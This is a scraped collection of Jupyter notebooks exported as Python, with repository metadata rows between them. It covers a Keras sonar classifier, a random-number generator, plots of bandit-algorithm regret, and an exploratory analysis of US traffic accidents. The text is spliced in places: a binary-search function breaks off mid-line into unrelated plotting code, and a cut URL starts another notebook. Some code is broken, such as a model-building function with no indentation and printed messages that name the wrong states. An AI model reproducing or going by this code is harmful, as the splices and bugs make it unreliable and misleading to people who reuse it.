wbG9hZGVkIGF0IGEgdGltZS4KY29uc3QgTUFYX1BBWUxPQURfU0laRSA9IDEwMCAqIDEwMjQ7Ci8vIE1heCBhbW91bnQgb2YgdGltZSB0byBibG9jayB3YWl0aW5nIGZvciB0aGUgdXNlci4KY29uc3QgRklMRV9DSEFOR0VfVElNRU9VVF9NUyA9IDMwICogMTAwMDsKCmZ1bmN0aW9uIF91cGxvYWRGaWxlcyhpbnB1dElkLCBvdXRwdXRJZCkgewogIGNvbnN0IHN0ZXBzID0gdXBsb2FkRmlsZXNTdGVwKGlucHV0SWQsIG91dHB1dElkKTsKICBjb25zdCBvdXRwdXRFbGVtZW50ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQob3V0cHV0SWQpOwogIC8vIENhY2hlIHN0ZXBzIG9uIHRoZSBvdXRwdXRFbGVtZW50IHRvIG1ha2UgaXQgYXZhaWxhYmxlIGZvciB0aGUgbmV4dCBjYWxsCiAgLy8gdG8gdXBsb2FkRmlsZXNDb250aW51ZSBmcm9tIFB5dGhvbi4KICBvdXRwdXRFbGVtZW50LnN0ZXBzID0gc3RlcHM7CgogIHJldHVybiBfdXBsb2FkRmlsZXNDb250aW51ZShvdXRwdXRJZCk7Cn0KCi8vIFRoaXMgaXMgcm91Z2hseSBhbiBhc3luYyBnZW5lcmF0b3IgKG5vdCBzdXBwb3J0ZWQgaW4gdGhlIGJyb3dzZXIgeWV0KSwKLy8gd2hlcmUgdGhlcmUgYXJlIG11bHRpcGxlIGFzeW5jaHJvbm91cyBzdGVwcyBhbmQgdGhlIFB5dGhvbiBzaWRlIGlzIGdvaW5nCi8vIHRvIHBvbGwgZm9yIGNvbXBsZXRpb24gb2YgZWFjaCBzdGVwLgovLyBUaGlzIHVzZXMgYSBQcm9taXNlIHRvIGJsb2NrIHRoZSBweXRob24gc2lkZSBvbiBjb21wbGV0aW9uIG9mIGVhY2ggc3RlcCwKLy8gdGhlbiBwYXNzZXMgdGhlIHJlc3VsdCBvZiB0aGUgcHJldmlvdXMgc3RlcCBhcyB0aGUgaW5wdXQgdG8gdGhlIG5leHQgc3RlcC4KZnVuY3Rpb24gX3VwbG9hZEZpbGVzQ29udGludWUob3V0cHV0SWQpIHsKICBjb25zdCBvdXRwdXRFbGVtZW50ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQob3V0cHV0SWQpOwogIGNvbnN0IHN0ZXBzID0gb3V0cHV0RWxlbWVudC5zdGVwczsKCiAgY29uc3QgbmV4dCA9IHN0ZXBzLm5leHQob3V0cHV0RWxlbWVudC5sYXN0UHJvbWlzZVZhbHVlKTsKICByZXR1cm4gUHJvbWlzZS5yZXNvbHZlKG5leHQudmFsdWUucHJvbWlzZSkudGhlbigodmFsdWUpID0+IHsKICAgIC8vIENhY2hlIHRoZSBsYXN0IHByb21pc2UgdmFsdWUgdG8gbWFrZSBpdCBhdmFpbGFibGUgdG8gdGhlIG5leHQKICAgIC8vIHN0ZXAgb2YgdGhlIGdlbmVyYXRvci4KICAgIG91dHB1dEVsZW1lbnQubGFzdFByb21pc2VWYWx1ZSA9IHZhbHVlOwogICAgcmV0dXJuIG5leHQudmFsdWUucmVzcG9uc2U7CiAgfSk7Cn0KCi8qKgogKiBHZW5lcmF0b3IgZnVuY3Rpb24gd2hpY2ggaXMgY2FsbGVkIGJldHdlZW4gZWFjaCBhc3luYyBzdGVwIG9mIHRoZSB1cGxvYWQKICogcHJvY2Vzcy4KICogQHBhcmFtIHtzdHJpbmd9IGlucHV0SWQgRWxlbWVudCBJRCBvZiB0aGUgaW5wdXQgZmlsZSBwaWNrZXIgZWxlbWVudC4KICogQHBhcmFtIHtzdHJpbmd9IG91dHB1dElkIEVsZW1lbnQgSUQgb2YgdGhlIG91dHB1dCBkaXNwbGF5LgogKiBAcmV0dXJuIHshSXRlcmFibGU8IU9iamVjdD59IEl0ZXJhYmxlIG9mIG5leHQgc3RlcHMuCiAqLwpmdW5jdGlvbiogdXBsb2FkRmlsZXNTdGVwKGlucHV0SWQsIG91dHB1dElkKSB7CiAgY29uc3QgaW5wdXRFbGVtZW50ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoaW5wdXRJZCk7CiAgaW5wdXRFbGVtZW50LmRpc2FibGVkID0gZmFsc2U7CgogIGNvbnN0IG91dHB1dEVsZW1lbnQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvdXRwdXRJZCk7CiAgb3V0cHV0RWxlbWVudC5pbm5lckhUTUwgPSAnJzsKCiAgY29uc3QgcGlja2VkUHJvbWlzZSA9IG5ldyBQcm9taXNlKChyZXNvbHZlKSA9PiB7CiAgICBpbnB1dEVsZW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY2hhbmdlJywgKGUpID0+IHsKICAgICAgcmVzb2x2ZShlLnRhcmdldC5maWxlcyk7CiAgICB9KTsKICB9KTsKCiAgY29uc3QgY2FuY2VsID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnYnV0dG9uJyk7CiAgaW5wdXRFbGVtZW50LnBhcmVudEVsZW1lbnQuYXBwZW5kQ2hpbGQoY2FuY2VsKTsKICBjYW5jZWwudGV4dENvbnRlbnQgPSAnQ2FuY2VsIHVwbG9hZCc7CiAgY29uc3QgY2FuY2VsUHJvbWlzZSA9IG5ldyBQcm9taXNlKChyZXNvbHZlKSA9PiB7CiAgICBjYW5jZWwub25jbGljayA9ICgpID0+IHsKICAgICAgcmVzb2x2ZShudWxsKTsKICAgIH07CiAgfSk7CgogIC8vIENhbmNlbCB1cGxvYWQgaWYgdXNlciBoYXNuJ3QgcGlja2VkIGFueXRoaW5nIGluIHRpbWVvdXQuCiAgY29uc3QgdGltZW91dFByb21pc2UgPSBuZXcgUHJvbWlzZSgocmVzb2x2ZSkgPT4gewogICAgc2V0VGltZW91dCgoKSA9PiB7CiAgICAgIHJlc29sdmUobnVsbCk7CiAgICB9LCBGSUxFX0NIQU5HRV9USU1FT1VUX01TKTsKICB9KTsKCiAgLy8gV2FpdCBmb3IgdGhlIHVzZXIgdG8gcGljayB0aGUgZmlsZXMuCiAgY29uc3QgZmlsZXMgPSB5aWVsZCB7CiAgICBwcm9taXNlOiBQcm9taXNlLnJhY2UoW3BpY2tlZFByb21pc2UsIHRpbWVvdXRQcm9taXNlLCBjYW5jZWxQcm9taXNlXSksCiAgICByZXNwb25zZTogewogICAgICBhY3Rpb246ICdzdGFydGluZycsCiAgICB9CiAgfTsKCiAgaWYgKCFmaWxlcykgewogICAgcmV0dXJuIHsKICAgICAgcmVzcG9uc2U6IHsKICAgICAgICBhY3Rpb246ICdjb21wbGV0ZScsCiAgICAgIH0KICAgIH07CiAgfQoKICBjYW5jZWwucmVtb3ZlKCk7CgogIC8vIERpc2FibGUgdGhlIGlucHV0IGVsZW1lbnQgc2luY2UgZnVydGhlciBwaWNrcyBhcmUgbm90IGFsbG93ZWQuCiAgaW5wdXRFbGVtZW50LmRpc2FibGVkID0gdHJ1ZTsKCiAgZm9yIChjb25zdCBmaWxlIG9mIGZpbGVzKSB7CiAgICBjb25zdCBsaSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2xpJyk7CiAgICBsaS5hcHBlbmQoc3BhbihmaWxlLm5hbWUsIHtmb250V2VpZ2h0OiAnYm9sZCd9KSk7CiAgICBsaS5hcHBlbmQoc3BhbigKICAgICAgICBgKCR7ZmlsZS50eXBlIHx8ICduL2EnfSkgLSAke2ZpbGUuc2l6ZX0gYnl0ZXMsIGAgKwogICAgICAgIGBsYXN0IG1vZGlmaWVkOiAkewogICAgICAgICAgICBmaWxlLmxhc3RNb2RpZmllZERhdGUgPyBmaWxlLmxhc3RNb2RpZmllZERhdGUudG9Mb2NhbGVEYXRlU3RyaW5nKCkgOgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnbi9hJ30gLSBgKSk7CiAgICBjb25zdCBwZXJjZW50ID0gc3BhbignMCUgZG9uZScpOwogICAgbGkuYXBwZW5kQ2hpbGQocGVyY2VudCk7CgogICAgb3V0cHV0RWxlbWVudC5hcHBlbmRDaGlsZChsaSk7CgogICAgY29uc3QgZmlsZURhdGFQcm9taXNlID0gbmV3IFByb21pc2UoKHJlc29sdmUpID0+IHsKICAgICAgY29uc3QgcmVhZGVyID0gbmV3IEZpbGVSZWFkZXIoKTsKICAgICAgcmVhZGVyLm9ubG9hZCA9IChlKSA9PiB7CiAgICAgICAgcmVzb2x2ZShlLnRhcmdldC5yZXN1bHQpOwogICAgICB9OwogICAgICByZWFkZXIucmVhZEFzQXJyYXlCdWZmZXIoZmlsZSk7CiAgICB9KTsKICAgIC8vIFdhaXQgZm9yIHRoZSBkYXRhIHRvIGJlIHJlYWR5LgogICAgbGV0IGZpbGVEYXRhID0geWllbGQgewogICAgICBwcm9taXNlOiBmaWxlRGF0YVByb21pc2UsCiAgICAgIHJlc3BvbnNlOiB7CiAgICAgICAgYWN0aW9uOiAnY29udGludWUnLAogICAgICB9CiAgICB9OwoKICAgIC8vIFVzZSBhIGNodW5rZWQgc2VuZGluZyB0byBhdm9pZCBtZXNzYWdlIHNpemUgbGltaXRzLiBTZWUgYi82MjExNTY2MC4KICAgIGxldCBwb3NpdGlvbiA9IDA7CiAgICB3aGlsZSAocG9zaXRpb24gPCBmaWxlRGF0YS5ieXRlTGVuZ3RoKSB7CiAgICAgIGNvbnN0IGxlbmd0aCA9IE1hdGgubWluKGZpbGVEYXRhLmJ5dGVMZW5ndGggLSBwb3NpdGlvbiwgTUFYX1BBWUxPQURfU0laRSk7CiAgICAgIGNvbnN0IGNodW5rID0gbmV3IFVpbnQ4QXJyYXkoZmlsZURhdGEsIHBvc2l0aW9uLCBsZW5ndGgpOwogICAgICBwb3NpdGlvbiArPSBsZW5ndGg7CgogICAgICBjb25zdCBiYXNlNjQgPSBidG9hKFN0cmluZy5mcm9tQ2hhckNvZGUuYXBwbHkobnVsbCwgY2h1bmspKTsKICAgICAgeWllbGQgewogICAgICAgIHJlc3BvbnNlOiB7CiAgICAgICAgICBhY3Rpb246ICdhcHBlbmQnLAogICAgICAgICAgZmlsZTogZmlsZS5uYW1lLAogICAgICAgICAgZGF0YTogYmFzZTY0LAogICAgICAgIH0sCiAgICAgIH07CiAgICAgIHBlcmNlbnQudGV4dENvbnRlbnQgPQogICAgICAgICAgYCR7TWF0aC5yb3VuZCgocG9zaXRpb24gLyBmaWxlRGF0YS5ieXRlTGVuZ3RoKSAqIDEwMCl9JSBkb25lYDsKICAgIH0KICB9CgogIC8vIEFsbCBkb25lLgogIHlpZWxkIHsKICAgIHJlc3BvbnNlOiB7CiAgICAgIGFjdGlvbjogJ2NvbXBsZXRlJywKICAgIH0KICB9Owp9CgpzY29wZS5nb29nbGUgPSBzY29wZS5nb29nbGUgfHwge307CnNjb3BlLmdvb2dsZS5jb2xhYiA9IHNjb3BlLmdvb2dsZS5jb2xhYiB8fCB7fTsKc2NvcGUuZ29vZ2xlLmNvbGFiLl9maWxlcyA9IHsKICBfdXBsb2FkRmlsZXMsCiAgX3VwbG9hZEZpbGVzQ29udGludWUsCn07Cn0pKHNlbGYpOwo=", "ok": true, "headers": [["content-type", "application/javascript"]], "status": 200.0, "status_text": ""}}, "base_uri": "https://localhost:8080/", "height": 89.0}
import tensorflow as tf
device_name = tf.test.gpu_device_name()
import keras
from google.colab import files
uploaded = files.upload()
import pandas as pd
import io
dataframe = pd.read_csv('sonar.csv', header=None)
# + id="2EJdV_7Cl9_J" colab_type="code" colab={}
import numpy
import pandas
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedKFold
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from keras.initializers import random_normal
# + id="hrfjUlS2mEvT" colab_type="code" colab={}
# fix random seed for reproducibility
seed = 7
numpy.random.seed(seed)
# + id="nncPBNJcmISo" colab_type="code" colab={}
# load dataset
dataframe = pandas.read_csv("sonar.csv", header=None)
dataset = dataframe.values
# split into input (X) and output (Y) variables
X = dataset[:,0:60].astype(float)
Y = dataset[:,60]
# + id="Lr3EEOZOmXhm" colab_type="code" outputId="36b10c60-fc3f-412e-e24b-3b4327ae3125" colab={"base_uri": "https://localhost:8080/", "height": 323.0}
le = LabelEncoder()
le.fit(Y)
encoded_Y=le.fit_transform(Y)
print(Y)
print(encoded_Y)
# + id="uQrazq1-rQ4k" colab_type="code" colab={}
model = Sequential()
Gaussian = random_normal()
def create_baseline():
# create model, write code below
model.add(Dense(60 , kernel_initializer = Gaussian , activation = 'relu' , input_dim=60))
model.add(Dense(1 , activation = 'sigmoid'))
# Compile model, write code below
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
return model
# + id="cfnTL9I-xB2v" colab_type="code" outputId="ce71f889-4e12-48c4-be95-1d89ed8640de" colab={"base_uri": "https://localhost:8080/", "height": 34.0}
estimator = KerasClassifier(build_fn=create_baseline, epochs=100, batch_size=5, verbose=0)
kfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)
results = cross_val_score(estimator, X, encoded_Y, cv=kfold)
print("Results: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
# + id="ISQfdFH_LMmP" colab_type="code" outputId="02d24113-7ad9-4a60-9e80-11cbb92fdaea" colab={"base_uri": "https://localhost:8080/", "height": 34.0}
numpy.random.seed(seed)
estimators = []
estimators.append(('standardize', StandardScaler()))
estimators.append(('mlp', KerasClassifier(build_fn=create_baseline, epochs=100, batch_size=5, verbose=0)))
pipeline = Pipeline(estimators)
kfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)
results = cross_val_score(pipeline, X, encoded_Y, cv=kfold)
print("Standardized: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
# + id="x19cpyiasUqp" colab_type="code" colab={}
| 10,750 |
/Random number generetor.ipynb
|
d36838a683cbeccd360ba666baea6d4c7a9e9350
|
[] |
no_license
|
ersangit01/Thesis
|
https://github.com/ersangit01/Thesis
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 2,445 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Program to generate random number
# # Linear Congural random number generetor
# +
import math
import numpy as np
from decimal import Decimal
import random
import pandas as pd
def gen_linear(a, seed,c, m):
x=seed
res=[]
for i in range(0,32):
val = (a * x + c) % m
x = val/m
res=np.append(res,x)
return (res)
a=2175143 # suitable range is from 12-23
X0=3553
c=10653
m=1000000
res=gen_linear(a,X0,c,m)
r_number=res
print(r_number)
r_number.dtype
# r_number.dtype()
# for i in range(0,32):
# temp1=(r_number[i])
# temp2=round(temp1,2)
# value=np.append(value,temp2)
# print(value)
| 993 |
/Exploratory Data Analysis for the DE, FL & CA data.ipynb
|
1918ef94ee704cfaf2aa7b8b78358b84f2d3be42
|
[] |
no_license
|
biggymuticha/us-accidents
|
https://github.com/biggymuticha/us-accidents
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 2,771,191 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# argv:
# - /home/ketchup/tools/anaconda3/bin/python
# - -m
# - ipykernel_launcher
# - -f
# - '{connection_file}'
# display_name: Python 3
# env: null
# interrupt_mode: signal
# language: python
# metadata: null
# name: python3
# ---
# define function is always the first step
def binary_search(list, item):
low = 0
high = len(list) - 1
while low
k in regrets_dict:
regrets_dict[k] = ('','')
for r_str in r_str_tuple:
if '_CNUCB_' in r_str:
regrets_dict['CN-UCB'] = (r_str, '.')
elif '_CNTS(M=1)_' in r_str:
regrets_dict['CN-TS(M=1)'] = (r_str, 'x')
elif '_CNTS_' in r_str:
regrets_dict['CN-TS'] = (r_str, '+')
elif '_CombLinUCB_' in r_str:
regrets_dict['CombLinUCB'] = (r_str, 's')
elif '_CombLinTS_' in r_str:
regrets_dict['CombLinTS'] = (r_str, 'd')
def plot(T, h, d, m, regrets_dict, save=False):
h1 = r'$h_{1}(\mathbf{x}) = \mathbf{x}^{\top}\mathbf{a}$'
h2 = r'$h_{2}(\mathbf{x}) = (\mathbf{x}^{\top}\mathbf{a})^{2}$'
h3 = r'$h_{3}(\mathbf{x}) = \cos(\pi \mathbf{x}^{\top}\mathbf{a})$'
h4 = r'$h_{4}(\mathbf{x}) = \sin(\pi \mathbf{x}^{\top}\mathbf{a})$'
if h == "h1":
hidden = h1
elif h == "h2":
hidden = h2
elif h == "h3":
hidden = h3
elif h == "h4":
hidden = h4
plt.style.use('default')
steps=np.arange(1,T+1)
freq = int(T/10)
for label, value in regrets_dict.items():
r_str = value[0]
marker = value[1]
if r_str:
# total_reg is a numpy array (L x T) where L is the number of repeated experiments
total_reg = np.load('regrets/' + r_str + '.npy')
### total_reg = np.load('regrets/' + r_str + '.npy')
avg_reg = total_reg.mean(axis=0)
sd_req = total_reg.std(axis=0)
plt.errorbar(steps, avg_reg, sd_req, errorevery=freq, marker= marker, markevery=freq, label=label, markersize=6, linewidth=2, elinewidth=1, capsize=3)
# plt.grid(True)
plt.grid(color='0.85')
plt.xlabel('Round ($t$)', size = 14)
plt.ylabel('Cumulative Regret', size = 14)
plt.title(r'{}, $d$={}, $m$={}'.format(hidden, d, m), size = 14)
plt.legend(loc='upper left', prop={'size': 12})
plt.tick_params(labelsize=12)
if save:
plt.savefig('plots/' + f'{h}-{d}-{m}' + '.png')
# -
T = 2000
d = 80
m = 40
h = 'h3'
#set_regrets_dict(f'reg_{h}_CNUCB_{d}_{m}')
# set_regrets_dict(f'reg_{h}_CNUCB_{d}_{m}', f'reg_{h}_CNTS_{d}_{m}')
set_regrets_dict(f'reg_{h}_CNUCB_{d}_{m}', f'reg_{h}_CNTS(M=1)_{d}_{m}', f'reg_{h}_CNTS_{d}_{m}')
plot(T, h, d, m, regrets_dict, save=True)
ps://github.com/RonghuiZhou/us-accidents
# ### Step 1. Import libraries
# Import numpy, pandas, matpltlib.pyplot, sklearn modules and seaborn
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from datetime import date
# %matplotlib inline
pd.set_option('display.max_rows', 200)
pd.set_option('display.max_columns', 200)
plt.style.use('ggplot')
# ### Step 2. Parameters, dataset and data manipulation
#
# #### A. Define parameters
# +
# Define lists of states, colors, linestyles, month order, day_order, and hour_order
# For this notebook, we will focus on the following three states: DE, FL, & CA
state_lst=['DE','FL','CA']
state_lst_full=['Delaware','Florida','California']
# We will focus on accident severities 2, 3 & 4
severity_lst=[2,3,4]
# Set a list of colors, markers and linestyles for plotting
color_lst=['r','b','k']
marker_lst=['D','o','*']
linestyle_lst=['dashed','dashdot','solid']
# Set a list of month, weekday, hour for reindex purpose and time_duraction to clear the accident
month_lst = [ 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul','Aug','Sep','Oct','Nov','Dec']
weekday_lst = [ 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
weekday_lst_full = [ 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
hour_lst= np.arange(24)
td='Time_Duration(min)'
# -
# ### Step 2. Parameters, dataset and data manipulation
#
# #### B. Import the dataset
# Import the data, slice the states of interests, and display the first 5 rows
df = pd.read_csv('./US_Accidents_May19.csv')
df = df[df.State.isin(state_lst)]
df.head()
# ### Step 2. Parameters, dataset and data manipulation
#
# #### C. Data manipulation: extract year, month, day, hour, weekday, and time to clear accidents
# +
# Extract year, month, day, hour, & weekday information
# Convert Start_Time and End_Time to datetypes
df['Start_Time'] = pd.to_datetime(df['Start_Time'], errors='coerce')
df['End_Time'] = pd.to_datetime(df['End_Time'], errors='coerce')
# Extract year, month, day, hour, weekday and time_duration information
df['Start_Year']=df['Start_Time'].dt.year
df['Start_Month']=df['Start_Time'].dt.strftime('%b')
df['Start_Day']=df['Start_Time'].dt.day
df['Start_Hour']=df['Start_Time'].dt.hour
df['Start_Weekday']=df['Start_Time'].dt.strftime('%a')
# Extract the amount of time in the unit of minutes for each accident, round to the nearest integer
td='Time_Duration(min)'
df[td]=round((df['End_Time']-df['Start_Time'])/np.timedelta64(1,'m'))
# Check the dataframe
df.head()
# -
# ### Step 3. Exploratory Data Analysis -- General
#
# #### Accident visualization A: accident map
# Visualization: map of accidents by state
sns.scatterplot(x='Start_Lng', y='Start_Lat', data=df, hue='State')
plt.xlabel('Longitude')
plt.ylabel('Latitude)')
plt.show()
# ### Step 3. Exploratory Data Analysis -- General
#
# #### Accident visualization B: time series analysis, resample by month
# Check the beginning and end date of this dataset
print('This dataset contains data beween {} and {}.'.format(df.Start_Time.min(),df.Start_Time.max()))
# #### How many days (Monday-Sunday) between the beginning and end of this dataset?
# +
# Find out how many days (Monday-Sunday) between the beginning and end of this dataset.
calendar_weekday_num=[]
d1=df.Start_Time.min()
d2=df.Start_Time.max()
for i in range(7):
count = 0
for d_ord in range(d1.toordinal(), d2.toordinal()+1):
d = date.fromordinal(d_ord)
if (d.weekday() == i):
count += 1
calendar_weekday_num.append(count)
print('Number of days for Monday-Sunday: {}.'.format(calendar_weekday_num))
print('Total number of days between {} and {}: {} days.'.format(d1,d2,sum(calendar_weekday_num)))
# -
# #### How many unique days with accidents for each state in this dataset?
# +
# Find out how many unique days in the dataset
allday_lst=df.Start_Time.astype(str).str.split(' ')
allday_lst2=[item[0] for item in allday_lst]
print('For the three states of New Jersey, Pennsylvania, & New York in this dataset:')
print('There are {} total accidents.'.format(df.shape[0]))
print('There are {} total days.'.format(len(allday_lst2)))
print('There are {} unique days.'.format(len(set(allday_lst2))))
print('On average, there are {} accidents per day.'.format(round(df.shape[0]/len(set(allday_lst2)))))
# -
# #### How many unique days with accident for each weekday/weekend for each state in this dataset?
# +
# For each state, find out how many unique days for each weekday/weekend
# Initialize an empty list to hold the number of days for each weekday/weekend for the three states
weekday_num_state=[]
# Run a for loop for the list of states: NJ, PA, & NY
for state in state_lst:
# Initialize an empty list to hold the number of days for each weekday
weekday_num=[]
# Run a for loop for the whole week
for weekday in weekday_lst:
# Slice the dataframe for specific state & weekday
df_weekday=df[(df['State']==state) & (df.Start_Weekday==weekday)]
# For each weekday, extract the day information from the Start_Time column, by separating the datetime into day and hour
day_lst1=df_weekday.Start_Time.astype(str).str.split(' ')
# Extract the first item which is the day information
day_lst2=[item[0] for item in day_lst1]
# Append the day into the list weekday_num
weekday_num.append(len(set(day_lst2)))
# Append the day with state information encoded into the list weekday_num_state
weekday_num_state.append(weekday_num)
print('For the states of {}, here is the list of numbers of weekdays (Mon-Sun): {}.'.format(state_lst,weekday_num_state))
# +
# Run a for loop for each state to find out the percentage of days with accidents during this period of time in the data set
day_pct_lst=[]
for i,state in enumerate(state_lst):
day_pct=[round(int(item1)/int(item2),2)*100 for item1,item2 in zip(weekday_num_state[i],calendar_weekday_num)]
day_pct_lst.append(day_pct)
print('For the state of {}, the percentage of days with accident during this period in the data set: {}%.'.format(state_lst[i], day_pct))
print(day_pct_lst)
# -
# #### Time series analysis, resample by month
# +
# Time series analysis, resample by month
# Set the start_time as the index for resampling purpose
df.set_index('Start_Time',drop=True,inplace=True)
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and weekday
df[df['State']==state].resample('M').count()['ID'].plot(linestyle=linestyle_lst[i], color=color_lst[i])
# Set the limits and labels
plt.xlim('2016','2019-Mar')
plt.xlabel('Year')
plt.title('{}'.format(state))
plt.show()
# Reset the index back for further data analysis
df.reset_index(inplace=True)
# -
# ### Step 3. Exploratory Data Analysis -- General
#
# #### Accident visualization C: accident severity distribution for each state
df.Severity.value_counts().sort_values(ascending=False)
# +
# The severity of accidents for each state
feature='Severity'
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Cutoff percentage for display
pct_cutoff=0
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and feature
df_temp=df[df['State']==state][feature].value_counts(normalize=True).round(2)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 3. Exploratory Data Analysis -- General
#
# #### Accident visualization D: how long does it take to clear the accident?
# +
# Find the median time to clear an accident for each state; for each of the following Severity (2,3,4)
# Initialize median_lst_state_severity
median_lst_state_severity=[]
# Run a for loop for each weather condition
for i,severity in enumerate(severity_lst):
# Initialize median_lst_state
median_lst_state=[]
# Run a for loop for each state
for j,state in enumerate(state_lst):
# Slice the dataframe for the specific state, weather condition and feature
df_temp=df[(df['State']==state) & (df['Severity']==severity)]
# Calculate 25, 50, and 75 quantile and interquantile range
df_25=df_temp[td].quantile(.25)
df_50=df_temp[td].quantile(.5)
df_75=df_temp[td].quantile(.75)
df_iqr=df_75-df_25
# print('1Q: {}; 3Q: {}; IQR: {}.'.format(df_25,df_75,df_iqr))
# Convert the series to a list
df_temp_lst=df_temp[td].tolist()
# Run a list comprehension to remove outliers and fill with median
# Define criteria for outlier: n*iqr
n=3
df_temp_lst=[item if ((item >= df_25 - n * df_iqr) & (item <= df_75 + n * df_iqr)) else df_50 for item in df_temp_lst]
# Convert back to pandas series
df_temp_lst=pd.Series(df_temp_lst)
# Extract the median after outlier manipulation, and append it to the list median_lst_state
median_lst_state.append(df_temp_lst.median())
median_lst_state_severity.append(median_lst_state)
print('State list: {}; Severity list: {}.'.format(state_lst,severity_lst))
# Set the size of the figure
fig= plt.figure(figsize=(5,6))
x_ticks=np.arange(len(median_lst_state_severity))
f, (ax, ax2) = plt.subplots(2, 1, sharex=True)
for i in range(len(median_lst_state_severity)):
# Assign the sublist to pts
pts=median_lst_state_severity[i]
# If we were to simply plot pts, we'd lose most of the interesting
# details due to the outliers. So let's 'break' or 'cut-out' the y-axis
# into two portions - use the top (ax) for the outliers, and the bottom
# (ax2) for the details of the majority of our data
# plot the same data on both axes
ax.plot(x_ticks, pts,linestyle=linestyle_lst[i], color=color_lst[i], marker=marker_lst[i])
ax2.plot(x_ticks, pts,linestyle=linestyle_lst[i], color=color_lst[i], marker=marker_lst[i])
# zoom-in / limit the view to different portions of the data
ax.set_ylim(350, 370) # outliers only
ax2.set_ylim(20, 50) # most of the data
# hide the spines between ax and ax2
ax.spines['bottom'].set_visible(False)
ax2.spines['top'].set_visible(False)
ax.xaxis.tick_top()
ax.tick_params(labeltop='off') # don't put tick labels at the top
ax2.xaxis.tick_bottom()
# This looks pretty good, and was fairly painless, but you can get that
# cut-out diagonal lines look with just a bit more work. The important
# thing to know here is that in axes coordinates, which are always
# between 0-1, spine endpoints are at these locations (0,0), (0,1),
# (1,0), and (1,1). Thus, we just need to put the diagonals in the
# appropriate corners of each of our axes, and so long as we use the
# right transform and disable clipping.
d = .015 # how big to make the diagonal lines in axes coordinates
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color='k', clip_on=False)
ax.plot((-d, +d), (-d, +d), **kwargs,label='_nolegend_') # top-left diagonal
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs,label='_nolegend_') # top-right diagonal
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d, +d), (1 - d, 1 + d), **kwargs,label='_nolegend_') # bottom-left diagonal
ax2.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs,label='_nolegend_') # bottom-right diagonal
# What's cool about this is that now if we vary the distance between
# ax and ax2 via f.subplots_adjust(hspace=...) or plt.subplot_tool(),
# the diagonal lines will move accordingly, and stay right at the tips
# of the spines they are 'breaking'
# Set labels, limit, legend, title and xticks
plt.xlabel('State')
plt.ylabel('Time (minutes)')
ax2.legend(['Severity: 2','Severity: 3','Severity: 4'],loc="best")
plt.xticks(np.arange(len(median_lst_state_severity)),(state_lst))
plt.title('How long does it take to clear the accident?')
plt.show()
# -
# ## How You Can Avoid Accident in 2020?
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 1: When do most accidents happen?
#
# ##### A. Daytime versus nighttime
# +
# The day or night when accidents occurred for each state
feature='Sunrise_Sunset'
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Cutoff percentage for display
pct_cutoff=2
# Define autopct: only display the value if the percentage is greater than the predefined cutoff value
def my_autopct(pct):
return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# Run a for loop for each state
for i,state in enumerate(state_lst):
# Set a sub plot
plt.subplot(1, 3, 1+i)
# Slice the dataframe for the specific state and feature
df_temp=df[df['State']==state][feature].value_counts(normalize=True).round(2)
# Define lables to go with the pie plot
labels = [n if v > pct_cutoff/100 else ''
for n, v in zip(df_temp.index, df_temp)]
# Generate the pie plot
plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
# Set axis,label and title
plt.axis('equal')
plt.xlabel(feature)
plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 1: When do most accidents happen?
#
